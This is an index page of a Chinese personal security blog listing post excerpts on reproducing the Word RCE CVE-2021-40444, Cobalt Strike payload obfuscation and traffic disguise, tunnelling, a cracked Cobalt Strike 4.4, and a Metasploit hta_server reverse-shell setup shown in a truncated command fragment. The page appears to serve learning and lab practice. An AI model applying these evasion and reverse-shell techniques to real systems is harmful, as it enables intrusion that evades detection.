孤桜懶契

Run


  • 首页

  • 导航

  • 归档

  • 分类

  • 标签

  • 友链

  • 关于

  • 搜索

【漏洞复现】Microsoft文档CVE-2021-40444

2021-09-16 | 知识积累 | | | 333
前言 恶意 docx 生成器利用 CVE-2021-40444(Microsoft Office Word 远程代码执行) 测试环境 windows 10 Office 2019word kali 简单复现exp方法一、这个需要一个依赖lcab 1apt-get install lcab ...
阅读全文 »

【远控使用】Cobalt Strike中Malleable-C2的使用

2021-09-16 | 知识积累 | | | 220
前言 Cobalt Strike的基础使用 Malleable C2简单的说就是beacon中payload的属性、行为、通过框架修改这些配置文件的属性,可以伪造正常的通信的流量,绕过ids入侵检测防火墙。 profiles配置文件的简单介绍 jitter 控制beacon的不稳定的抖动时间 ...
阅读全文 »

【远控使用】Cobalt Strike免杀payload

2021-09-11 | 知识积累 | | | 1.2k
前言 Cobalt Strike的基础使用 Shellcode混淆免杀 在github逛了一波,找到一个8月20多号的shellcode混淆脚本,不知道什么时候会失效,先记录一下使用方法 预备:python3.x,安装依赖的话就用pip就行 下载地址:https://github.com/if ...
阅读全文 »

【知识积累】Hexo中next主题微信引流教程

2021-09-11 | 知识积累 | | | 630
前言 相信不少伙伴在github中搭建了属于自己的博客,我最近看了其他文章学习到一个姿势,就是微信怎么用博客引流,这时看到了OpenWrite 一、OpenWrite设置1、打开https://openwrite.cn/进行注册 2、登陆后,选择增长工具 3、点击添加,填写自己的微信公众号信 ...
阅读全文 »

【HEXO】我的主题自动化搭建和说明(懒人资源)

2021-09-10 | 知识积累 | | | 437
前言 当然,这只是简陋的说明一下关于我给大家的主题(theme)怎么使用的方法,具体很多细节,需要大家自己去修改,也许会有许多坑,相信大家一定可以自己填满 一点都不会的话,建议去看看这篇文章试着搭建一个博客再来说 主题使用1、我给大家打压缩包(在文章的最底部有下载链接,我也会想办法上传到githu ...
阅读全文 »

【远控工具】Cobalt Strike 4.4破解版

2021-09-10 | 黑客工具 | | | 721
Cobalt Strike 4.4更新日志cobalt strike4.4于2021 年 8 月 4 日发布 12345678910111213141516171819202122232425262728293031-------------+ 添加对用户定义反射加载器的支持。 https:&# ...
阅读全文 »

【远控使用】Cobalt Strike的SSH隧道在beacon的应用

2021-09-10 | 知识积累 | | | 330
前言 Cobalt Strike基本学习 SSH在隧道里的运行 这里说一下关于我的理解,当用socat将对方的445端口代理到我们的445端口上时,访问我们的445端口,则会通过本地的1080来去访问对方的445端口 根据图片可以了解到,那我们利用1080端口去登陆对方ubuntu的 ...
阅读全文 »

【远控使用】Cobalt Strike隧道使用

2021-09-09 | 知识积累 | | | 153
前言 Cobalt Strike基本学习 隧道使用这里操作更顺滑 直接socks代理 然后本地用proxychains4a代理sock4就行了 接着就可以用proxychains4来扫描该主机的tcp端口 MSF在beacon的使用同样的也可以代理到msf中,可以发送信息和 ...
阅读全文 »

【远控使用】Cobalt Strike自动化横向渗透

2021-09-09 | 知识积累 | | | 29
前言 Cobalt Strike基本学习 自动化横向渗透 我的个人博客 孤桜懶契:http://gylq.gitee.io
阅读全文 »

【远控使用】metaslpoit不出网上线

2021-09-08 | CTF | | | 257
hta_server模块使用1234567use exploit/windows/misc/hta_serverset target 1set payload windows/x64/meterpreter/reverse_tcpset S ...
阅读全文 »
上一页1…678…21下一页
孤桜懶契

孤桜懶契

203 文章
9 分类
123 标签
RSS High~
近期文章
  • 【漏扫工具】渗透测试常用工具集整理(包含xray、awvs等)
  • 【应急靶场实践】Ubuntu-暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
  • 【渗透靶场实践】Win2008-暴力破解、留后门隐藏账户与shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)
  • 【应急靶场实践】Win2008-暴力破解、留隐藏账户后门与shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)
  • 【渗透靶场实践】Linux-暴力破解、替换ps命令、留多个后门——事件复现(含靶场环境)
© 2020 — 2022 | 275.6k
我的第 位朋友, 历经 次回眸才与你相遇
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️